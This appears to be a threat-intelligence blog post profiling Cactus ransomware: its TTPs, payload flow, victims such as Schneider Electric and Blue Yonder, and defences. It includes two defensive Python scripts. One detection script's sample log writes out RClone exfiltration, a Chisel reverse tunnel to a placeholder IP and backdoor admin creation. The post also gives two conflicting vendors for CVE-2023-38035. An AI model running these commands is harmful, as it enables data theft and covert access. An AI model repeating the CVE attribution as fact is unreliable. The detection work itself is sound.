February 24, 2025

Cactus Ransomware



Cactus ransomware, which emerged around March 2023, has quickly become a significant threat in the threat landscape. This strain employs double-extortion tactics: it encrypts victims' data and threatens to leak it publicly if the ransom is not paid. Cactus is notable for its rapid exploitation of known vulnerabilities, particularly in VPN appliances and, more recently, in Qlik Sense software. Combined with the techniques it uses to evade detection and achieve persistence, this makes Cactus a formidable adversary for organizations of all sizes. The "digital kidnapping" of data and systems for financial gain is the core principle, and Cactus embodies it with its aggressive tactics.

Origins & Evolution

Cactus ransomware was first identified and tracked around March 2023. The name derives from the ransom note filename, "cAcTuS.readme.txt," and the file extension appended to encrypted files, ".cts[number]". While a relatively new entrant, Cactus has quickly targeted large commercial organizations, demonstrating a capacity for high-impact attacks.

While definitive attribution is challenging, Cactus shares some characteristics with other ransomware families. Some researchers have observed similarities in TTPs (Tactics, Techniques, and Procedures) with groups like BLACKBASTA, particularly in the use of the TotalExec.ps1 script for automated deployment. The Bitdefender report discusses potential early activity involving Kinsing, a group known for cryptojacking. The ransomware's encryption scheme, in which the binary requires a key to decrypt itself, suggests a level of sophistication aimed at avoiding anti-virus detection (Kroll). The use of CVEs so soon after their release also puts the group in the same ballpark as other established threat actors.

The evolution of Cactus is evident in its shifting initial access vectors. Initially, the exploitation of VPN vulnerabilities, specifically in Fortinet appliances (CVE-2023-38035), was a common entry point. More recently, Cactus operators have been observed exploiting vulnerabilities in Qlik Sense software (CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365), demonstrating an ability to adapt to new targets and exploit newly discovered weaknesses rapidly. Attacks have also expanded to include virtualization infrastructure (ESXi and Hyper-V).

Tactics & Techniques

Cactus ransomware employs a multi-stage attack chain, leveraging various techniques to infiltrate networks, establish persistence, exfiltrate data, and ultimately encrypt files. Here's a breakdown of key TTPs:

  • Initial Access (T1190 - Exploit Public-Facing Application): Cactus primarily gains initial access by exploiting vulnerabilities in public-facing applications. This has included Fortinet VPN vulnerabilities (CVE-2023-38035) and, more recently, Qlik Sense vulnerabilities (CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365).

  • Persistence (T1053 - Scheduled Task/Job): After gaining initial access, Cactus establishes persistence using several methods. A common tactic is creating an SSH backdoor to the C2 server that is maintained through scheduled tasks; the Install.bat script is used for this purpose. The ransomware also uses scheduled tasks to execute itself from %ProgramData% with the -r argument.

  • Reconnaissance (T1078.002 - Domain Accounts, T1087 - Account Discovery, T1049 - System Network Connections Discovery, T1018 - Remote System Discovery):

* Network scanning with tools like SoftPerfect Network Scanner and the PSnmap PowerShell script (PSnmap.ps1) is used to gather IP addresses, enumerate endpoints, identify users, and check for active machines.

* Remote Monitoring and Management (RMM) tools, such as AnyDesk and Splashtop, are installed for persistent access and payload delivery.

  • Lateral Movement (T1570 - Lateral Tool Transfer, T1555.003 - Credentials from Web Browsers, T1003 - OS Credential Dumping):

* Cactus uses credential harvesting techniques, including LSASS credential dumping. Credentials are also dumped from web browsers and password files on disk.

* RDP (Remote Desktop Protocol) is used for lateral movement, leveraging valid or newly created accounts.

* Remote management tools, such as SuperOps RMM, are also utilized.

  • Command & Control (C2) (T1219 - Remote Access Software, T1090 - Proxy): Chisel (SOCKS5 proxy over SSH) is used in conjunction with Cobalt Strike for further C2 communication.

  • Defense Evasion (T1562.001 - Disable or Modify Tools, T1136 - Create Account, T1027 - Obfuscated Files or Information):

* Cactus attempts to disable or modify anti-virus software. This is often done via batch scripts and, in some cases, by using the anti-virus software's own uninstaller.

* The f1.bat script is used to create a new administrator user account (e.g., Adm1nBac).

* The encryptor binary is packed (UPX) and requires a key to decrypt and execute, hindering analysis and detection. Threat intelligence feeds are one source of IOCs for this stage.

  • Exfiltration (T1567.002 - Exfiltration to Cloud Storage): RClone is used for data exfiltration to cloud storage services before encryption takes place.

  • Encryption & Impact (T1486 - Data Encrypted for Impact):

* Cactus executes TotalExec.ps1 remotely on discovered devices. This script, in turn, executes f1.bat, f2.bat, and the ransomware payload.

* The ransomware uses a combination of RSA and AES encryption (AES_CBC_256 + RSA_4096). For files larger than 7.7MB, partial encryption is employed.

* Encrypted files receive the extension ".cts[number]".

* Ransom notes, named "cAcTuS.readme.txt," are dropped in every processed folder.
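The TTPs above translate directly into detection logic. The following script is an added example, not code from this article or from any EDR vendor: it runs a small rule set over constructed process-creation events in a made-up log format (the host names, user names, paths, command lines and rule names are all assumptions) and flags the behaviours listed above: RMM tool launches, RClone exfiltration, Chisel tunnelling, a new local administrator created the way f1.bat does, and a scheduled task that runs a binary from %ProgramData% with the -r argument. Hosts showing two or more distinct techniques are escalated, because a single hit (an RMM tool, say) is often legitimate on its own.

```python
"""Detection of the Cactus tradecraft listed above over process-creation
telemetry. Added example, not code from the article or from an EDR vendor:
the log format, hosts, users, paths, command lines and rule names are
constructed for illustration."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str         # short rule identifier (assumed naming)
    technique: str    # ATT&CK technique the article maps the behaviour to
    pattern: re.Pattern


# Behaviours taken from the TTP list: RMM tools, RClone exfiltration, Chisel
# tunnelling, admin account creation (f1.bat), scheduled task from %ProgramData% -r.
RULES = (
    Rule("rmm-tool-launch", "T1219",
         re.compile(r"\b(anydesk|splashtop|superops)\b", re.I)),
    Rule("rclone-exfil", "T1567.002",
         re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)),
    Rule("chisel-tunnel", "T1090",
         re.compile(r"\bchisel(\.exe)?\b.*\bclient\b", re.I)),
    Rule("local-admin-created", "T1136",
         re.compile(r"\bnet1?(\.exe)?\s+(user\s+\S+\s+\S+\s+/add"
                    r"|localgroup\s+administrators\s+\S+\s+/add)", re.I)),
    Rule("programdata-scheduled-task", "T1053",
         re.compile(r"\bschtasks(\.exe)?\b.*/create.*programdata.*\s-r\b", re.I)),
)

# One event per line: timestamp, host, user, image path, then the raw command
# line (which may itself contain quotes). The format is a constructed one.
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)"
    r"\s+image=(?P<image>\S+)\s+cmdline=(?P<cmdline>.*)$")

SAMPLE_LOG = [  # constructed events; 203.0.113.0/24 is a documentation range
    r'2025-02-24T09:01:00Z host=WS01 user=CORP\jdoe image=C:\Windows\System32\schtasks.exe cmdline=schtasks /create /tn "SysUpdate" /tr "C:\ProgramData\8f2c\svc.exe -r" /sc onstart /ru SYSTEM',
    r'2025-02-24T09:03:00Z host=WS01 user=CORP\jdoe image=C:\Windows\System32\net.exe cmdline=net user Adm1nBac P@ssw0rd! /add',
    r'2025-02-24T09:03:05Z host=WS01 user=CORP\jdoe image=C:\Windows\System32\net.exe cmdline=net localgroup administrators Adm1nBac /add',
    r'2025-02-24T09:12:00Z host=WS01 user=CORP\jdoe image=C:\Users\jdoe\AppData\Local\Temp\rclone.exe cmdline=rclone.exe copy D:\Finance remote:exfil-bucket --transfers 8',
    r'2025-02-24T09:15:00Z host=WS01 user=CORP\jdoe image=C:\Users\jdoe\Downloads\chisel.exe cmdline=chisel.exe client 203.0.113.10:8080 R:socks',
    r'2025-02-24T09:20:00Z host=WS03 user=CORP\asmith image=C:\Users\asmith\Downloads\AnyDesk.exe cmdline=AnyDesk.exe --install',
    r'2025-02-24T09:21:00Z host=WS02 user=CORP\bwong image=C:\Windows\System32\notepad.exe cmdline=notepad.exe report.txt',
]


def parse_event(line: str):
    """Return the event fields as a dict, or None for lines that do not fit the format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def detect(lines):
    """Run every rule over every parsable event; one hit per (event, matching rule)."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for rule in RULES:
            if rule.pattern.search(ev["cmdline"]):
                hits.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "rule": rule.name, "technique": rule.technique,
                             "cmdline": ev["cmdline"]})
    return hits


def hosts_to_escalate(hits, min_techniques=2):
    """Hosts on which at least `min_techniques` distinct techniques were observed."""
    seen = {}
    for h in hits:
        seen.setdefault(h["host"], set()).add(h["technique"])
    return sorted(host for host, techs in seen.items() if len(techs) >= min_techniques)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["host"]} {h["technique"]:<10} {h["rule"]:<28} {h["cmdline"]}')
    print("escalate:", hosts_to_escalate(found))
```

The rules deliberately key on command-line content rather than image paths, since the tools are routinely renamed; in production the same patterns would sit in a SIEM or EDR query against Sysmon Event ID 1 or Windows Security Event ID 4688 command-line auditing, with the ProgramData and net-user rules tuned against the environment's own deployment scripts.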

Payload Analysis and Execution Flow

  • Arguments: The Cactus payload's execution flow changes based on arguments provided at launch. Initial execution typically uses the -r argument.

  • Mutex Creation: Creates a mutex with a unique Project ID (UID) to ensure only one instance runs if the -r argument is present.

  • Key Loading: Loads hardcoded hexadecimal data, converts it to a string, and decrypts the public key using an AESKeyDecrypt function.

  • Copying and Persistence (-s argument): Creates the C:\ProgramData folder, extracts the UID, and creates a self-copy within that folder. It also generates ntuser.dat, storing the ransomware file path and execution arguments.

  • Service Termination: Terminates specific services and processes, such as those related to SQL, backups, and security software.

  • Encryption: Encrypts files with RSA and AES (AES_CBC_256 + RSA_4096), excluding specific file extensions. Partial encryption is applied to large files.

  • Ransom Note: Creates randomly named ransom notes prefixed and postfixed with "C.A.c_T.U-S-R.e-a_D.m-e".
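When responding to a suspected Cactus infection, the naming artifacts above (the ".cts[number]" extension, the cAcTuS.readme.txt note, and the random note names wrapped in "C.A.c_T.U-S-R.e-a_D.m-e") are the quickest way to scope which shares and folders were processed. The following triage routine is an added example, not code from the article or from Kroll or Bitdefender: it classifies an in-memory listing of constructed sample files, and adds a Shannon-entropy check on each file's leading bytes as a generic heuristic for encrypted content that carries no tell-tale name. The entropy threshold, the sample size and the file set are assumptions of mine.

```python
"""File-system triage for the Cactus encryption artifacts described above.
Added example, not from the article or from Kroll/Bitdefender: the sample
files are built in memory, and the entropy heuristic with its threshold is
an assumption of mine, not something the article attributes to Cactus."""
import math
import re
from collections import Counter
from pathlib import PureWindowsPath

ENCRYPTED_EXT = re.compile(r"\.cts\d+$", re.I)      # ".cts[number]" from the article
NOTE_FIXED_NAME = "cactus.readme.txt"               # cAcTuS.readme.txt, compared case-insensitively
NOTE_MARKER = "C.A.c_T.U-S-R.e-a_D.m-e"             # prefix and suffix of random-named notes
ENTROPY_THRESHOLD = 7.5   # assumed; 8.0 bits/byte is the maximum for byte data
HEAD_BYTES = 4096         # assumed number of leading bytes sampled per file


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte over `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_encrypted_name(name: str) -> bool:
    return ENCRYPTED_EXT.search(name) is not None


def is_ransom_note(name: str) -> bool:
    if name.lower() == NOTE_FIXED_NAME:
        return True
    return (len(name) > len(NOTE_MARKER)
            and name.startswith(NOTE_MARKER) and name.endswith(NOTE_MARKER))


def triage(files):
    """files: mapping of Windows path -> leading bytes of that file.

    Returns sorted lists of encrypted files, ransom notes, high-entropy files
    without a known name, and the directories that hold notes or encrypted files."""
    result = {"encrypted": [], "notes": [], "high_entropy_unlabelled": [], "affected_dirs": set()}
    for path, head in files.items():
        p = PureWindowsPath(path)
        if is_ransom_note(p.name):
            result["notes"].append(path)
            result["affected_dirs"].add(str(p.parent))
        elif is_encrypted_name(p.name):
            result["encrypted"].append(path)
            result["affected_dirs"].add(str(p.parent))
        elif shannon_entropy(head[:HEAD_BYTES]) >= ENTROPY_THRESHOLD:
            # Compressed formats (zip, PDF streams, media) also score high, so this
            # bucket is a review queue, not a verdict. Because Cactus only partially
            # encrypts files above 7.7 MB, a head-only sample can also miss them.
            result["high_entropy_unlabelled"].append(path)
    for key in ("encrypted", "notes", "high_entropy_unlabelled"):
        result[key].sort()
    result["affected_dirs"] = sorted(result["affected_dirs"])
    return result


SAMPLE_FILES = {  # constructed listing; contents are placeholders
    r"C:\Users\jdoe\Documents\budget.xlsx.cts1": bytes(range(256)) * 4,   # uniform bytes: entropy 8.0
    r"C:\Users\jdoe\Documents\cAcTuS.readme.txt": b"constructed ransom note body",
    r"C:\Users\jdoe\Documents\notes.txt": b"quarterly planning notes " * 40,
    r"D:\Share\C.A.c_T.U-S-R.e-a_D.m-e7f3a9C.A.c_T.U-S-R.e-a_D.m-e": b"constructed note body",
    r"D:\Share\report.pdf": bytes(range(256)) * 2,   # looks compressed: review queue, not a verdict
    r"D:\Share\empty.bin": b"",
}

if __name__ == "__main__":
    for bucket, items in triage(SAMPLE_FILES).items():
        print(f"{bucket}:")
        for item in items:
            print("   ", item)
```

On a live host the mapping would be filled by walking the file system and reading only the first HEAD_BYTES of each file, which keeps the scan cheap on large shares; the affected-directory list is what feeds the scoping and restore plan.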

Targets or Victimology

Cactus ransomware primarily targets large commercial organizations. While potentially opportunistic, the group has demonstrated a willingness to target high-profile victims, including multinational corporations. This suggests a focus on targets with the potential for significant ransom payments and valuable data for extortion.

Industries targeted have included:

  • Technology: The compromise of Qlik Sense software indicates a focus on technology providers.

  • Manufacturing: Schneider Electric, a major player in energy management and automation, was a significant victim.

  • Supply Chain: Attacks on supply chain vendors (like Schneider Electric's Sustainability Business division and Blue Yonder) highlight a strategy of disrupting multiple organizations through a single point of compromise.

The geographical scope of Cactus attacks appears to be broad. Schneider Electric, a French company with global operations, was targeted, suggesting a willingness to operate internationally. The Bitdefender report details attacks on two companies, one being US-based and the other having a strong presence in Europe.

Cactus's double-extortion tactics indicate a primary motivation of financial gain. The threat of leaking stolen data, coupled with the encryption of critical systems, significantly increases the pressure on victims to pay the ransom.

Attack Campaigns

Several notable attack campaigns have been attributed to Cactus ransomware:

  1. Schneider Electric (January 2024): This attack targeted the Sustainability Business division of Schneider Electric, a French multinational corporation. Cactus claimed to have stolen 1.5TB of data. The attack had potential supply chain implications, impacting clients of the Sustainability Business division.

  2. Qlik Sense Exploitation (Late 2023): Darktrace observed Cactus operators exploiting Qlik Sense vulnerabilities before this attack vector was publicly reported. This highlights Cactus's ability to rapidly leverage newly discovered vulnerabilities.

  3. Multi-Company Attack (Late 2023, detailed by Bitdefender): This coordinated attack targeted two companies, demonstrating Cactus's ability to conduct simultaneous operations. The attack involved exploiting CVE-2023-38035 (Ivanti MobileIron Sentry) and expanding to target virtualization infrastructure (ESXi and Hyper-V).

  4. Blue Yonder (November 2024): Blue Yonder, a supply chain software vendor, was breached. The attack caused operational disruptions for several prominent companies and led to the theft of sensitive data.

Defenses

Combating Cactus ransomware requires a multi-layered approach, combining proactive prevention with robust detection and response capabilities. Key defense strategies include:

  • Vulnerability Management and Patching: Promptly patch known vulnerabilities, especially in internet-facing applications like VPNs and software like Qlik Sense. This is critical given Cactus's rapid exploitation of newly discovered vulnerabilities. Prioritize patching of internet-exposed servers within a defined patch management process.

  • Multi-Factor Authentication (MFA): Implement MFA on all critical systems, particularly VPNs and remote access services, to mitigate the risk of credential-based attacks.

  • Network Segmentation: Implement network segmentation to limit lateral movement. A zero-trust model can further enhance security.

  • Endpoint Detection and Response (EDR): Deploy EDR solutions capable of detecting malicious PowerShell scripts, credential dumping, unauthorized software installation, and other suspicious activities.

  • Privileged Access Management (PAM): Monitor and restrict privileged account usage. Enforce strong password policies and regularly review account permissions.

  • Backup and Recovery: Maintain offline backups and test restoration procedures regularly. This is essential for recovering from encryption, even if a ransom is paid.

  • Security Awareness Training: Educate users about phishing and other social engineering attacks. Train them to identify and report suspicious emails and attachments.

  • Regular Security Audits: Conduct routine security audits and penetration testing to identify and remediate vulnerabilities.

  • Monitor for RMM Tools: Closely monitor the usage of remote management tools, as they are frequently abused by attackers.

  • Threat Intelligence: Leverage threat intelligence feeds to stay informed about emerging threats and IOCs related to Cactus and other ransomware groups.

  • Effective Logging: Enable and maintain robust security logging.

  • Collaboration and Information Sharing: Participate in threat intelligence sharing.

  • Autonomous Response: Consider implementing autonomous response capabilities to contain attacks in their early stages, before significant damage occurs. SOAR platforms can automate this containment.

  • Decoding Script: Utilize scripts like the one Kroll released to decode the ntuser.dat file.

Conclusion

Cactus ransomware represents a significant and evolving threat to organizations, particularly those with valuable data and critical infrastructure. Its rapid exploitation of vulnerabilities, sophisticated techniques, and double-extortion tactics make it a formidable adversary. By understanding Cactus's TTPs, targets, and attack campaigns, organizations can implement effective defenses to mitigate the risk of infection and minimize the impact of a successful attack. A proactive, multi-layered security approach, combining robust vulnerability management, strong access controls, advanced detection capabilities, and comprehensive incident response planning, is crucial for staying ahead of this and other emerging ransomware threats. Constant vigilance and adaptation are key in the ongoing battle against ransomware.


Arun KL

Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.
